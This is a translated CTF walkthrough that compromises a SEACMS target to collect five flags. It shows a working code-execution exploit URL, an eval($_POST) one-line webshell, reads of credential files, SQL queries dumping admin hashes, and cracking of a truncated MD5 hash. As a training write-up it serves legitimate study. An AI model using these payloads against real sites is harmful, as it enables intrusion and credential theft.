2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through a "CTF host penetration" exercise, showing the process step by step on a practical case.
The challenge is as follows:
A total of 5 flags must be found. Where to start?
Step 1: First, open the target address: http://202.0.0.206
Step 2: Vulnerability analysis
Analysis shows that the target is running the SEACMS platform.
A code execution vulnerability in this version is known from other forum platforms. Exp: /search.php?searchtype=5&tid=&area=phpinfo(). Let's test whether it can be exploited. Whatever is placed in the position of phpinfo() is executed as PHP, so arbitrary PHP code can be run. Visiting http://202.0.0.206/search.php?searchtype=5&tid=&area=phpinfo() shows that phpinfo() executes successfully, which confirms that the vulnerability exists.
Next, check whether the page source contains a flag. Right-click and view the source of this page; it does contain one: flag=flag1{ac727d1a3130e4093b3665120a3240a5}
Step 3: Using a one-line webshell
Next, we use a one-line webshell to take advantage of the vulnerability.
Use exp: /search.php?searchtype=5&tid=&area=eval($_POST[simple]) to construct the one-line webshell.
Open the "kitchen knife" tool and enter the following in the address bar:
http://202.0.0.206/search.php?searchtype=5&tid=&area=eval($_POST[simple]), with the password simple, then click Add.
The connection succeeds.
Step 4: Looking around
What follows is a time-consuming search. Like a burglar in a house with no particular target, all you can do is rummage at random.
After a long search, a key file turns up in the /home directory. Opening the file gives flag2:
flag2{6634eaf4ce34a82da12d835c1ed86a24}
The MySQL configuration file my.cnf is in the /etc directory. It contains flag3 and the database account information: flag3{da04113d21f02f0ebfd281d0a7a64e34}, along with the database password.
Step 5: Database operations
Using the database username and password obtained in the previous step, reconfigure the "kitchen knife" tool and connect to the database.
Submit to open the database. The flag table in the seacms database contains flag=flag4{32730c5cc0bd7bb8ffde4457649fd409}
Query the account name and password of the seacms backend in the database.
SELECT `name` FROM `sea_admin`
SELECT `password` FROM `sea_admin`
Step 6: password cracking
The password obtained is stored as an MD5 value: 23a7bbd73250516f069d. Looking for an online MD5 lookup through Baidu, we notice that the value is 20 characters long, the same scheme that dedecms uses. Removing the first three characters and the last character leaves a 16-character MD5 value, and the online lookup result for it is admin123.
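The truncation described above, checked in Python as an added example that is not part of the original write-up. It assumes the 20-character value is characters 5 to 24 of the 32-character hex MD5 (the usual dedecms-style layout) and sets that unsalted scheme beside a salted PBKDF2 hash; all function names are hypothetical.

```python
import hashlib
import hmac
import os

STORED = "23a7bbd73250516f069d"  # 20-character value quoted in the write-up


def legacy_hash20(password):
    # Assumed dedecms-style layout: characters 5..24 of the 32-char hex MD5.
    return hashlib.md5(password.encode()).hexdigest()[5:25]


def to_md5_16(stored20):
    # Drop the first three and the last character, as the write-up describes.
    if len(stored20) != 20:
        raise ValueError("expected a 20-character value")
    return stored20[3:-1]


def md5_16(password):
    # Conventional 16-character MD5: the middle 16 hex digits of the digest.
    return hashlib.md5(password.encode()).hexdigest()[8:24]


def strong_hash(password, salt=None, iterations=600_000):
    # Hardened counterpart: per-user random salt plus a slow KDF (PBKDF2-SHA256).
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def strong_verify(password, salt, digest, iterations=600_000):
    # Constant-time comparison avoids leaking how many bytes matched.
    candidate = strong_hash(password, salt, iterations)[1]
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print(to_md5_16(STORED), md5_16("admin123") == to_md5_16(STORED))
    # Unsalted: the same password always yields the same stored value.
    print(legacy_hash20("admin123") == STORED)
    salt, digest = strong_hash("admin123")
    print(strong_verify("admin123", salt, digest))
```

Because the legacy value is an unsalted slice of plain MD5, any public lookup table resolves a weak password such as the one in this exercise; the salted, iterated form produces a different stored value for every account.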
Step 6: Finding the admin login page
Next, find the admin (backend) login page of the website. Here we use the DirBuster tool.
Log in to the site backend with the username and password already obtained from the database; the password is admin123.
The login succeeds: we have found the backend login page and can log in with the administrator account.
Step 7: Looking around
After wandering around the backend for a long time, I finally found key5 while looking at the scheduled tasks in the site backend.
flag5{f01cbadfd0daee0d65c2502a38581558}
At this point all five flags have been found, and we enter the five flags in the answer box.